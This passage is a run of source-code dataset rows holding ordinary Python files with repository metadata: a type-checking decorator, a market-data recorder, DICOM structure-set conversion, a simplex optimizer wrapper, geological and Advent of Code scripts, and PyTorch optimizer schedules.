"MIT"
] | 1
|
2020-12-16T18:34:19.000Z
|
2020-12-16T18:34:19.000Z
|
import functools
def enforceType(func):
@functools.wraps(func)
def wrapper(*args):
wrapper.has_been_called = True
x = func.__annotations__
t = [x[i] for i in x if i != 'return']
if len(args) != len(t):
raise TypeError("Missing required positional arguments and/or annotations.")
for i in range(len(t)):
if not isinstance(args[i],t[i]):
raise ValueError(f"Invalid literal for {t[i]}: {args[i]}")
try:
ReturnValue = x['return']
except KeyError:
raise TypeError("Missing required return value annotation.")
try:
RV = func(*args)
except Exception as e:
raise Exception(e)
ReturnValue = type(ReturnValue) if ReturnValue == None else ReturnValue
if not isinstance(RV, ReturnValue):
raise SyntaxWarning(f"Expected function to return {ReturnValue}. Got {type(RV)} instead.")
return RV
wrapper.has_been_called = False
return wrapper
| 23.275
| 94
| 0.664876
| 124
| 931
| 4.927419
| 0.451613
| 0.032733
| 0.045827
| 0.065466
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.221267
| 931
| 39
| 95
| 23.871795
| 0.842759
| 0
| 0
| 0.076923
| 0
| 0
| 0.228786
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.076923
| false
| 0
| 0.038462
| 0
| 0.192308
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b591052db3d50aa3c4ca4b5f6cbba2c5ca1708a6
| 3,239
|
py
|
Python
|
examples/DataRecording/runDataRecording.py
|
mumuwoyou/pytrader
|
6b94e0c8ecbc3ef238cf31715acf8474b9d26b4a
|
[
"MIT"
] | 4
|
2019-03-14T05:30:59.000Z
|
2021-11-21T20:05:22.000Z
|
examples/DataRecording/runDataRecording.py
|
mumuwoyou/pytrader
|
6b94e0c8ecbc3ef238cf31715acf8474b9d26b4a
|
[
"MIT"
] | null | null | null |
examples/DataRecording/runDataRecording.py
|
mumuwoyou/pytrader
|
6b94e0c8ecbc3ef238cf31715acf8474b9d26b4a
|
[
"MIT"
] | 4
|
2019-02-14T14:30:46.000Z
|
2021-01-05T09:46:19.000Z
|
# encoding: UTF-8
from __future__ import print_function
import sys
try:
reload(sys) # Python 2
sys.setdefaultencoding('utf8')
except NameError:
pass # Python 3
import multiprocessing
from time import sleep
from datetime import datetime, time
from cyvn.trader.vtEvent import EVENT_LOG, EVENT_RECORDER_DAY,EVENT_ERROR
from cyvn.trader.eventEngine import EventEngine2, Event
from cyvn.trader.vtEngine import MainEngine, LogEngine
from cyvn.trader.gateway.CtpGateway import ctpGateway
from cyvn.trader.app import dataRecorder
#----------------------------------------------------------------------
def processErrorEvent(event):
"""
处理错误事件
错误信息在每次登陆后,会将当日所有已产生的均推送一遍,所以不适合写入日志
"""
error = event.dict_['data']
print(u'错误代码:%s,错误信息:%s' %(error.errorID, error.errorMsg))
#----------------------------------------------------------------------
def runChildProcess():
"""子进程运行函数"""
print('-'*20)
# 创建日志引擎
le = LogEngine()
le.setLogLevel(le.LEVEL_INFO)
le.addConsoleHandler()
le.info(u'启动行情记录运行子进程')
ee = EventEngine2()
le.info(u'事件引擎创建成功')
me = MainEngine(ee)
me.addGateway('CTP')
me.addApp(dataRecorder)
le.info(u'主引擎创建成功')
ee.register(EVENT_LOG, le.processLogEvent)
ee.register(EVENT_ERROR, processErrorEvent)
le.info(u'注册日志事件监听')
me.connect('CTP')
le.info(u'连接CTP接口')
has_recorder_day = False
while True:
sleep(1)
if has_recorder_day == False:
time_now = datetime.now()
if time_now.time().hour ==15 and time_now.time().minute > 5:
event1 = Event(type_=EVENT_RECORDER_DAY)
ee.put(event1)
has_recorder_day = True
#----------------------------------------------------------------------
def runParentProcess():
"""父进程运行函数"""
# 创建日志引擎
le = LogEngine()
le.setLogLevel(le.LEVEL_INFO)
le.addConsoleHandler()
le.info(u'启动行情记录守护父进程')
DAY_START = time(8, 57) # 日盘启动和停止时间
DAY_END = time(15, 18)
NIGHT_START = time(20, 57) # 夜盘启动和停止时间
NIGHT_END = time(2, 33)
p = None # 子进程句柄
while True:
currentTime = datetime.now().time()
recording = False
# 判断当前处于的时间段
if ((currentTime >= DAY_START and currentTime <= DAY_END) or
(currentTime >= NIGHT_START) or
(currentTime <= NIGHT_END)):
recording = True
# 过滤周末时间段:周六全天,周五夜盘,周日日盘
if ((datetime.today().weekday() == 6) or
(datetime.today().weekday() == 5 and currentTime > NIGHT_END) or
(datetime.today().weekday() == 0 and currentTime < DAY_START)):
recording = False
# 记录时间则需要启动子进程
if recording and p is None:
le.info(u'启动子进程')
p = multiprocessing.Process(target=runChildProcess)
p.start()
le.info(u'子进程启动成功')
# 非记录时间则退出子进程
if not recording and p is not None:
le.info(u'关闭子进程')
p.terminate()
p.join()
p = None
le.info(u'子进程关闭成功')
sleep(5)
if __name__ == '__main__':
#runChildProcess()
runParentProcess()
| 26.120968
| 77
| 0.562211
| 346
| 3,239
| 5.135838
| 0.378613
| 0.033765
| 0.039392
| 0.018571
| 0.075408
| 0.075408
| 0.075408
| 0.075408
| 0.075408
| 0.075408
| 0
| 0.013502
| 0.268293
| 3,239
| 123
| 78
| 26.333333
| 0.736287
| 0.12967
| 0
| 0.151899
| 0
| 0
| 0.041096
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.037975
| false
| 0.012658
| 0.126582
| 0
| 0.164557
| 0.037975
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b593abbfc1101fb51b4b3e49fd3161d9712060e7
| 12,779
|
py
|
Python
|
sitk_rtss_io.py
|
Auto-segmentation-in-Radiation-Oncology/Chapter-3
|
307330c848c7ddb650353484e18fa9bc7903f737
|
[
"BSD-3-Clause"
] | 1
|
2020-06-28T01:57:46.000Z
|
2020-06-28T01:57:46.000Z
|
sitk_rtss_io.py
|
Auto-segmentation-in-Radiation-Oncology/Chapter-12
|
307330c848c7ddb650353484e18fa9bc7903f737
|
[
"BSD-3-Clause"
] | null | null | null |
sitk_rtss_io.py
|
Auto-segmentation-in-Radiation-Oncology/Chapter-12
|
307330c848c7ddb650353484e18fa9bc7903f737
|
[
"BSD-3-Clause"
] | 1
|
2021-11-15T21:47:17.000Z
|
2021-11-15T21:47:17.000Z
|
from skimage import measure
import pydicom
from pydicom.dataset import Dataset, FileDataset
from pydicom.sequence import Sequence
import os
import numpy as np
import SimpleITK as sITK
import time
import glob
import sitk_ct_io as imio
from skimage.draw import polygon
# for debugging
# import matplotlib.pyplot as plt
# import matplotlib.image as mpimg
def read_rtss_to_sitk(rtss_file, image_dir, return_names=True, return_image=False):
# modified code from xuefeng
# http://aapmchallenges.cloudapp.net/forums/3/2/
#
# The image directory is required to set the spacing on the label map
# read the rtss
contours, label_names = read_contours(pydicom.read_file(rtss_file))
# read the ct
dcms = []
for subdir, dirs, files in os.walk(image_dir):
dcms = glob.glob(os.path.join(subdir, "*.dcm"))
slices = [pydicom.read_file(dcm) for dcm in dcms]
slices.sort(key=lambda x: float(x.ImagePositionPatient[2]))
image = np.stack([s.pixel_array for s in slices], axis=-1)
# convert to mask
atlas_labels = get_mask(contours, slices, image)
atlas_image = imio.read_sitk_image_from_dicom(image_dir)
atlas_labels.SetOrigin(atlas_image.GetOrigin())
atlas_labels.SetSpacing(atlas_image.GetSpacing())
if not return_names:
return atlas_labels
elif not return_image:
return atlas_labels, label_names
else:
return atlas_labels, label_names, atlas_image
def write_rtss_from_sitk(labels, label_names, ct_directory, output_filename):
# labels is a sITK image volume with integer labels for the objects
# assumes 0 for background and consequtive label numbers starting from 1
# corresponding to the label_names
# the ct_directory is required to correctly link the UIDs
# load ct to get slice UIDs, z-slices and anything else we might need
slice_info = {}
series_info = {}
z_values = []
first_slice = True
spacing = [0, 0]
origin = [0, 0]
with os.scandir(ct_directory) as it:
for entry in it:
if not entry.name.startswith('.') and entry.is_file():
slice_file = ct_directory + entry.name
dicom_info = pydicom.read_file(slice_file)
slice_info[str(float(dicom_info.SliceLocation))] = dicom_info.SOPInstanceUID
z_values.append(float(dicom_info.SliceLocation))
if first_slice:
# get generic information
series_info['SOPClassUID'] = dicom_info.SOPClassUID
series_info['FrameOfReferenceUID'] = dicom_info.FrameOfReferenceUID
series_info['StudyInstanceUID'] = dicom_info.StudyInstanceUID
series_info['SeriesInstanceUID'] = dicom_info.SeriesInstanceUID
series_info['PatientName'] = dicom_info.PatientName
series_info['PatientID'] = dicom_info.PatientID
series_info['PatientBirthDate'] = dicom_info.PatientBirthDate
series_info['PatientSex'] = dicom_info.PatientSex
spacing[0] = float(dicom_info.PixelSpacing[0])
spacing[1] = float(dicom_info.PixelSpacing[1])
origin[0] = float(dicom_info.ImagePositionPatient[0])
origin[1] = float(dicom_info.ImagePositionPatient[1])
# Assuming axial for now
first_slice = False
z_values = np.sort(z_values)
current_time = time.localtime()
modification_time = time.strftime("%H%M%S", current_time)
modification_time_long = modification_time + '.123456' # madeup
modification_date = time.strftime("%Y%m%d", current_time)
file_meta = Dataset()
file_meta.FileMetaInformationGroupLength = 192
file_meta.MediaStorageSOPClassUID = '1.2.840.10008.5.1.4.1.1.481.3'
file_meta.MediaStorageSOPInstanceUID = "1.2.826.0.1.3680043.2.1125." + modification_time + ".3" + modification_date
file_meta.ImplementationClassUID = "1.2.3.771212.061203.1"
file_meta.TransferSyntaxUID = '1.2.840.10008.1.2'
pydicom.dataset.validate_file_meta(file_meta, True)
ds = FileDataset(output_filename, {},
file_meta=file_meta, preamble=b"\0" * 128)
# Add the data elements
ds.PatientName = series_info['PatientName']
ds.PatientID = series_info['PatientID']
ds.PatientBirthDate = series_info['PatientBirthDate']
ds.PatientSex = series_info['PatientSex']
# Set the transfer syntax
ds.is_little_endian = True
ds.is_implicit_VR = True
# Set lots of tags
ds.ContentDate = modification_date
ds.SpecificCharacterSet = 'ISO_IR 100' # probably not true TODO Check
ds.InstanceCreationDate = modification_date
ds.InstanceCreationTime = modification_time_long
ds.StudyDate = modification_date
ds.SeriesDate = modification_date
ds.ContentTime = modification_time
ds.StudyTime = modification_time_long
ds.SeriesTime = modification_time_long
ds.AccessionNumber = ''
ds.SOPClassUID = '1.2.840.10008.5.1.4.1.1.481.3' # RT Structure Set Stroage
ds.SOPInstanceUID = "1.2.826.0.1.3680043.2.1125." + modification_time + ".3" + modification_date
ds.Modality = "RTSTRUCT"
ds.Manufacturer = "Python software"
ds.ManufacturersModelName = 'sitk_rtss_io.py'
ds.ReferringPhysiciansName = ''
ds.StudyDescription = ""
ds.SeriesDescription = "RTSS from SimpleITK data"
ds.StudyInstanceUID = series_info['StudyInstanceUID']
ds.SeriesInstanceUID = "1.2.826.0.1.3680043.2.1471." + modification_time + ".4" + modification_date
ds.StructureSetLabel = "RTSTRUCT"
ds.StructureSetName = ''
ds.StructureSetDate = modification_time
ds.StructureSetTime = modification_time
contour_sequence = Sequence()
for slice_z in z_values:
contour_data = Dataset()
contour_data.ReferencedSOPClassUID = series_info['SOPClassUID']
contour_data.ReferencedSOPInstanceUID = slice_info[str(slice_z)]
contour_sequence.append(contour_data)
referenced_series = Dataset()
referenced_series.SeriesInstanceUID = series_info['SeriesInstanceUID']
referenced_series.ContourImageSequence = contour_sequence
referenced_study = Dataset()
referenced_study.ReferencedSOPClassUID = '1.2.840.10008.3.1.2.3.2'
referenced_study.ReferencedSOPInstanceUID = series_info['StudyInstanceUID']
referenced_study.RTReferencedSeriesSequence = Sequence([referenced_series])
frame_of_ref_data = Dataset()
frame_of_ref_data.FrameOfReferenceUID = series_info['FrameOfReferenceUID']
frame_of_ref_data.RTReferencedStudySequence = Sequence([referenced_study])
ds.ReferencedFrameOfReferenceSequence = Sequence([frame_of_ref_data])
roi_sequence = Sequence()
roi_observations = Sequence()
for label_number in range(0, len(label_names)):
roi_data = Dataset()
roi_obs = Dataset()
roi_data.ROINumber = label_number + 1
roi_obs.ObservationNumber = label_number + 1
roi_obs.ReferencedROINumber = label_number + 1
roi_data.ReferencedFrameOfReferenceUID = series_info['FrameOfReferenceUID']
roi_data.ROIName = label_names[label_number]
roi_data.ROIObservationDescription = ''
roi_data.ROIGenerationAlgorithm = 'Atlas-based'
roi_data.ROIGenerationMethod = 'Python'
roi_obs.RTROIInterpretedType = ''
roi_obs.ROIInterpreter = ''
roi_sequence.append(roi_data)
roi_observations.append(roi_obs)
ds.StructureSetROISequence = roi_sequence
ds.RTROIObservationsSequence = roi_observations
# as if that wasn't bad enough, now we have to add the contours!
label_data = sITK.GetArrayFromImage(labels)
roi_contour_sequence = Sequence()
for label_number in range(0, len(label_names)):
roi_contour_data = Dataset()
roi_contour_data.ROIDisplayColor = '255\\0\\0'
roi_contour_data.ReferencedROINumber = label_number + 1
contour_sequence = Sequence()
# convert labels to polygons
contour_number = 0
for slice_number in range(0, labels.GetSize()[2] - 1):
slice_data = label_data[slice_number, :, :]
slice_for_label = np.where(slice_data != label_number + 1, 0, slice_data)
if np.any(np.isin(slice_for_label, label_number + 1)):
contours = measure.find_contours(slice_for_label, (float(label_number + 1) / 2.0))
for contour in contours:
# Convert to real world and add z_position
# plt.imshow(slice_data)
# plt.plot(contour[:, 1], contour[:, 0], color='#ff0000')
contour_as_string = ''
is_first_point = True
for point in contour[:-1]:
real_contour = [point[1] * spacing[0] + origin[0], point[0] * spacing[1] + origin[1],
z_values[slice_number]]
if not is_first_point:
contour_as_string = contour_as_string + '\\'
else:
is_first_point = False
contour_as_string = contour_as_string + str(real_contour[0]) + '\\'
contour_as_string = contour_as_string + str(real_contour[1]) + '\\'
contour_as_string = contour_as_string + str(real_contour[2])
contour_number = contour_number + 1
contour_data = Dataset()
contour_data.ContourGeometricType = 'CLOSED_PLANAR'
contour_data.NumberOfContourPoints = str(len(contour))
contour_data.ContourNumber = str(contour_number)
image_data = Dataset()
image_data.ReferencedSOPClassUID = series_info['SOPClassUID']
image_data.ReferencedSOPInstanceUID = slice_info[str(z_values[slice_number])]
contour_data.ContourImageSequence = Sequence([image_data])
contour_data.ContourData = contour_as_string
contour_sequence.append(contour_data)
roi_contour_data.ContourSequence = contour_sequence
roi_contour_sequence.append(roi_contour_data)
ds.ROIContourSequence = roi_contour_sequence
ds.ApprovalStatus = 'UNAPPROVED'
ds.save_as(output_filename)
return
def read_contours(structure_file):
# code from xuefeng
# http://aapmchallenges.cloudapp.net/forums/3/2/
contours = []
contour_names = []
for i in range(len(structure_file.ROIContourSequence)):
contour = {'color': structure_file.ROIContourSequence[i].ROIDisplayColor,
'number': structure_file.ROIContourSequence[i].ReferencedROINumber,
'name': structure_file.StructureSetROISequence[i].ROIName}
assert contour['number'] == structure_file.StructureSetROISequence[i].ROINumber
contour['contours'] = [s.ContourData for s in structure_file.ROIContourSequence[i].ContourSequence]
contours.append(contour)
contour_names.append(contour['name'])
return contours, contour_names
def get_mask(contours, slices, image):
# code from xuefeng
# http://aapmchallenges.cloudapp.net/forums/3/2/
z = [s.ImagePositionPatient[2] for s in slices]
pos_r = slices[0].ImagePositionPatient[1]
spacing_r = slices[0].PixelSpacing[1]
pos_c = slices[0].ImagePositionPatient[0]
spacing_c = slices[0].PixelSpacing[0]
im_dims = image.shape
label = np.zeros([im_dims[2], im_dims[1], im_dims[0]], dtype=np.uint8)
z_index = 0
for con in contours:
num = int(con['number'])
for c in con['contours']:
nodes = np.array(c).reshape((-1, 3))
assert np.amax(np.abs(np.diff(nodes[:, 2]))) == 0
zNew = [round(elem, 1) for elem in z]
try:
z_index = z.index(nodes[0, 2])
except ValueError:
try:
z_index = zNew.index(round(nodes[0, 2], 1))
except ValueError:
print('Slice not found for ' + con['name'] + ' at z = ' + str(nodes[0, 2]))
r = (nodes[:, 1] - pos_r) / spacing_r
c = (nodes[:, 0] - pos_c) / spacing_c
rr, cc = polygon(r, c)
label[z_index, rr, cc] = num
return sITK.GetImageFromArray(label)
| 44.526132
| 120
| 0.642069
| 1,456
| 12,779
| 5.414148
| 0.223214
| 0.025371
| 0.019028
| 0.013954
| 0.126728
| 0.071927
| 0.068121
| 0.066218
| 0.066218
| 0.049474
| 0
| 0.026108
| 0.26567
| 12,779
| 286
| 121
| 44.681818
| 0.813939
| 0.083418
| 0
| 0.063927
| 0
| 0.009132
| 0.062407
| 0.016062
| 0
| 0
| 0
| 0.003497
| 0.009132
| 1
| 0.018265
| false
| 0
| 0.050228
| 0
| 0.09589
| 0.004566
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b59742af888cb2d88c4cbf6cba219ceb64599613
| 2,364
|
py
|
Python
|
code/opt_algo/downhillsimplex_untested.py
|
nicolai-schwartze/Masterthesis
|
7857af20c6b233901ab3cedc325bd64704111e16
|
[
"MIT"
] | 1
|
2020-06-13T10:02:02.000Z
|
2020-06-13T10:02:02.000Z
|
code/opt_algo/downhillsimplex_untested.py
|
nicolai-schwartze/Masterthesis
|
7857af20c6b233901ab3cedc325bd64704111e16
|
[
"MIT"
] | null | null | null |
code/opt_algo/downhillsimplex_untested.py
|
nicolai-schwartze/Masterthesis
|
7857af20c6b233901ab3cedc325bd64704111e16
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Mon Apr 20 14:03:18 2020
@author: Nicolai
"""
import sys
sys.path.append("../differential_evolution")
from JADE import JADE
import numpy as np
import scipy as sc
import testFunctions as tf
def downhillsimplex(population, function, minError, maxFeval):
'''
implementation of a memetic JADE: \n
maxFeval-2*dim of the function evaluation are spend on JADE
2*dim of the function evaluation is used to perform a downhill simplex
internal parameters of JADE are set to p=0.3 and c=0.5
Parameters
----------
population: numpy array
2D numpy array where lines are candidates and colums is the dimension
function: function
fitness function that is optimised
minError: float
stopping condition on function value
maxFeval: int
stopping condition on max number of function evaluation
Returns
-------
history: tuple
tupel[0] - popDynamic
tupel[1] - FEDynamic
tupel[2] - FDynamic
tupel[3] - CRDynamic
Examples
--------
>>> import numpy as np
>>> def sphere(x):
return np.dot(x,x)
>>> minError = -1*np.inf
>>> maxGen = 10**3
>>> population = 100*np.random.rand(50,2)
>>> (popDynamic, FEDynamic, FDynamic, CRDynamic) =
JADE(population, sphere, minError, maxGen)
'''
psize, dim = population.shape
startSolution = population[np.random.randint(0, high=psize)]
_, _, _, _, _, allvecs = sc.optimize.fmin(function, startSolution, ftol=minError, \
maxfun=maxFeval, \
full_output = True, retall = True)
FDynamic = []
CRDynamic = []
popDynamic = []
FEDynamic = []
for x in allvecs:
popDynamic.append(np.array([x]))
FEDynamic.append(function(allvecs[-1]))
return (popDynamic, FEDynamic, FDynamic, CRDynamic)
if __name__ == "__main__":
import matplotlib.pyplot as plt
population = 100*np.random.rand(4,2)
minError = 10**-200
maxFeval = 10**3
H = 100
p = 0.3
c = 0.5
(popDynamic, FEDynamic, FDynamic, CRDynamic) = downhillsimplex(population, \
tf.sphere, minError, maxFeval)
plt.semilogy(FEDynamic)
| 26.863636
| 87
| 0.593909
| 270
| 2,364
| 5.144444
| 0.462963
| 0.054716
| 0.058315
| 0.077754
| 0.074874
| 0.038877
| 0
| 0
| 0
| 0
| 0
| 0.033878
| 0.300761
| 2,364
| 88
| 88
| 26.863636
| 0.806413
| 0.436971
| 0
| 0
| 0
| 0
| 0.028473
| 0.02157
| 0
| 0
| 0
| 0
| 0
| 1
| 0.032258
| false
| 0
| 0.193548
| 0
| 0.258065
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b59a516d2e4ba77e47687f54990e9a2e4f955197
| 1,185
|
py
|
Python
|
LoopStructural/modelling/features/lambda_geological_feature.py
|
wgorczyk/LoopStructural
|
bedc7abd4c1868fdbd6ed659c8d72ef19f793875
|
[
"MIT"
] | 67
|
2020-06-25T06:50:58.000Z
|
2022-03-29T17:15:43.000Z
|
LoopStructural/modelling/features/lambda_geological_feature.py
|
wgorczyk/LoopStructural
|
bedc7abd4c1868fdbd6ed659c8d72ef19f793875
|
[
"MIT"
] | 60
|
2020-06-28T22:58:21.000Z
|
2022-03-24T01:30:59.000Z
|
LoopStructural/modelling/features/lambda_geological_feature.py
|
wgorczyk/LoopStructural
|
bedc7abd4c1868fdbd6ed659c8d72ef19f793875
|
[
"MIT"
] | 9
|
2020-06-25T13:07:39.000Z
|
2021-12-01T01:41:24.000Z
|
"""
Geological features
"""
import logging
import numpy as np
logger = logging.getLogger(__name__)
class LambdaGeologicalFeature:
def __init__(self,function = None,name = 'unnamed_lambda', gradient_function = None, model = None):
self.function = function
self.name = name
self.gradient_function = gradient_function
self.model = model
if self.model is not None:
v = function(self.model.regular_grid((10, 10, 10)))
self._min = np.nanmin(v)#function(self.model.regular_grid((10, 10, 10))))
self._max = np.nanmax(v)
else:
self._min = 0
self._max = 0
def evaluate_value(self, xyz):
v = np.zeros((xyz.shape[0]))
if self.function is None:
v[:] = np.nan
else:
v[:] = self.function(xyz)
return v
def evaluate_gradient(self,xyz):
v = np.zeros((xyz.shape[0],3))
if self.gradient_function is None:
v[:,:] = np.nan
else:
v[:,:] = self.gradient_function(xyz)
return v
def min(self):
return self._min
def max(self):
return self._max
| 27.55814
| 103
| 0.563713
| 148
| 1,185
| 4.351351
| 0.283784
| 0.124224
| 0.093168
| 0.055901
| 0.350932
| 0.285714
| 0.285714
| 0.285714
| 0.21118
| 0.121118
| 0
| 0.021014
| 0.3173
| 1,185
| 43
| 104
| 27.55814
| 0.775031
| 0.057384
| 0
| 0.147059
| 0
| 0
| 0.012613
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.147059
| false
| 0
| 0.058824
| 0.058824
| 0.352941
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b59a84378daec5c068b0ad9a5875001c348356a9
| 2,137
|
py
|
Python
|
2021/day8.py
|
Bug38/AoC
|
576ee0d3745242b71240a62c121c52bc92f7253e
|
[
"MIT"
] | null | null | null |
2021/day8.py
|
Bug38/AoC
|
576ee0d3745242b71240a62c121c52bc92f7253e
|
[
"MIT"
] | null | null | null |
2021/day8.py
|
Bug38/AoC
|
576ee0d3745242b71240a62c121c52bc92f7253e
|
[
"MIT"
] | null | null | null |
from typing import Set
import utils
data = utils.getLinesFromFile("day8.input")
# data = ['be cfbegad cbdgef fgaecd cgeb fdcge agebfd fecdb fabcd edb | fdgacbe cefdb cefbgd gcbe','edbfga begcd cbg gc gcadebf fbgde acbgfd abcde gfcbed gfec | fcgedb cgb dgebacf gc','fgaebd cg bdaec gdafb agbcfd gdcbef bgcad gfac gcb cdgabef | cg cg fdcagb cbg','fbegcd cbd adcefb dageb afcb bc aefdc ecdab fgdeca fcdbega | efabcd cedba gadfec cb','aecbfdg fbg gf bafeg dbefa fcge gcbea fcaegb dgceab fcbdga | gecf egdcabf bgf bfgea','fgeab ca afcebg bdacfeg cfaedg gcfdb baec bfadeg bafgc acf | gebdcfa ecba ca fadegcb','dbcfg fgd bdegcaf fgec aegbdf ecdfab fbedc dacgb gdcebf gf | cefg dcbef fcge gbcadfe','bdfegc cbegaf gecbf dfcage bdacg ed bedf ced adcbefg gebcd | ed bcgafe cdgba cbgef','egadfb cdbfeg cegd fecab cgb gbdefca cg fgcdab egfdb bfceg | gbdfcae bgc cg cgb','gcafb gcf dcaebfg ecagb gf abcdeg gaef cafbge fdbac fegbdc | fgae cfgab fg bagce']
# data = ['acedgfb cdfbe gcdfa fbcad dab cefabd cdfgeb eafb cagedb ab | cdfeb fcadb cdfeb cdbaf']
inputs, outputs = [], []
for d in data:
a, b = d.split('|')
inputs.append(a.strip().split())
outputs.append(b.strip().split())
def part1():
ret = 0
for os in outputs:
for o in os:
if len(o) in [2, 3, 4, 7]:
ret += 1
return ret
def part2():
ret = 0
for i, ins in enumerate(inputs):
ins = sorted(ins, key=len)
wires = [0, ins[0], 0, 0, ins[2], 0, 0, ins[1], ins[-1], 0]
for w in ins:
if len(w) in [2, 3, 4, 7]:
continue
if len(w) == 5 and set(wires[1]).issubset(set(w)):
wires[3] = w
continue
if len(w) == 6 and set(wires[3]).issubset(set(w)):
wires[9] = w
continue
elif len(w) == 6 and set(wires[1]).issubset(set(w)):
wires[0] = w
continue
elif len(w) == 6:
wires[6] = w
continue
for w in ins:
if w in wires:
continue
if set(w).issubset(set(wires[6])):
wires[5] = w
else:
wires[2] = w
value = ""
for o in outputs[i]:
for i, w in enumerate(wires):
if set(o) == set(w):
value += str(i)
break
ret += int(value)
return ret
print(f'Part1: {part1()}')
print(f'Part2: {part2()}')
| 35.616667
| 860
| 0.657932
| 364
| 2,137
| 3.862637
| 0.535714
| 0.010669
| 0.012802
| 0.036273
| 0.102418
| 0.078236
| 0.041252
| 0.041252
| 0
| 0
| 0
| 0.025045
| 0.215255
| 2,137
| 59
| 861
| 36.220339
| 0.813357
| 0.44642
| 0
| 0.230769
| 0
| 0
| 0.036441
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.038462
| false
| 0
| 0.038462
| 0
| 0.115385
| 0.038462
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b59c0e7ce913172c25c6a249bc299d0133408394
| 4,951
|
py
|
Python
|
utils/optimizers.py
|
csalt-research/OpenASR-py
|
9aea6753689d87d321260d7eb0ea0544e1b3403a
|
[
"MIT"
] | 2
|
2019-11-29T15:46:14.000Z
|
2021-05-28T06:54:41.000Z
|
utils/optimizers.py
|
csalt-research/OpenASR-py
|
9aea6753689d87d321260d7eb0ea0544e1b3403a
|
[
"MIT"
] | null | null | null |
utils/optimizers.py
|
csalt-research/OpenASR-py
|
9aea6753689d87d321260d7eb0ea0544e1b3403a
|
[
"MIT"
] | null | null | null |
""" Optimizers class """
import torch
import torch.optim as optim
from torch.nn.utils import clip_grad_norm_
import operator
import functools
from copy import copy
from math import sqrt
def build_torch_optimizer(model, opt):
params = [p for p in model.parameters() if p.requires_grad]
if opt.optim == 'sgd':
optimizer = optim.SGD(
params,
lr=opt.learning_rate)
elif opt.optim == 'adagrad':
optimizer = optim.Adagrad(
params,
lr=opt.learning_rate,
initial_accumulator_value=opt.adagrad_accumulator_init)
elif opt.optim == 'adadelta':
optimizer = optim.Adadelta(
params,
lr=opt.learning_rate)
elif opt.optim == 'adam':
optimizer = optim.Adam(
params,
lr=opt.learning_rate,
betas=[opt.adam_beta1, opt.adam_beta2],
eps=1e-9)
else:
raise ValueError('Invalid optimizer type: ' + opt.optim)
return optimizer
def make_lr_decay_fn(opt):
if opt.decay_method == 'noam':
return functools.partial(
noam_decay,
warmup_steps=opt.warmup_steps,
model_size=opt.dec_rnn_size)
elif opt.decay_method == 'noamwd':
return functools.partial(
noamwd_decay,
warmup_steps=opt.warmup_steps,
model_size=opt.dec_rnn_size,
rate=opt.learning_rate_decay,
decay_steps=opt.decay_steps,
start_step=opt.start_decay_steps)
elif opt.decay_method == 'rsqrt':
return functools.partial(
rsqrt_decay, warmup_steps=opt.warmup_steps)
elif opt.start_decay_steps is not None:
return functools.partial(
exponential_decay,
rate=opt.learning_rate_decay,
decay_steps=opt.decay_steps,
start_step=opt.start_decay_steps)
def noam_decay(step, warmup_steps, model_size):
"""
Learning rate schedule described in
https://arxiv.org/pdf/1706.03762.pdf.
"""
return (
model_size ** (-0.5) *
min(step ** (-0.5), step * warmup_steps**(-1.5)))
def noamwd_decay(step, warmup_steps, model_size,
rate, decay_steps, start_step=0):
"""
Learning rate schedule optimized for huge batches
"""
return (
model_size ** (-0.5) *
min(step ** (-0.5), step * warmup_steps**(-1.5)) *
rate ** (max(step - start_step + decay_steps, 0) // decay_steps))
def exponential_decay(step, rate, decay_steps, start_step=0):
"""
A standard exponential decay, scaling the learning rate by :obj:`rate`
every :obj:`decay_steps` steps.
"""
return rate ** (max(step - start_step + decay_steps, 0) // decay_steps)
def rsqrt_decay(step, warmup_steps):
"""
Decay based on the reciprocal of the step square root.
"""
return 1.0 / sqrt(max(step, warmup_steps))
class Optimizer(object):
def __init__(self,
optimizer,
learning_rate,
learning_rate_decay_fn=None,
max_grad_norm=None):
self._optimizer = optimizer
self._learning_rate = learning_rate
self._learning_rate_decay_fn = learning_rate_decay_fn
self._max_grad_norm = max_grad_norm or 0
self._training_step = 1
self._decay_step = 1
@property
def training_step(self):
return self._training_step
def learning_rate(self):
if self._learning_rate_decay_fn is None:
return self._learning_rate
scale = self._learning_rate_decay_fn(self._decay_step)
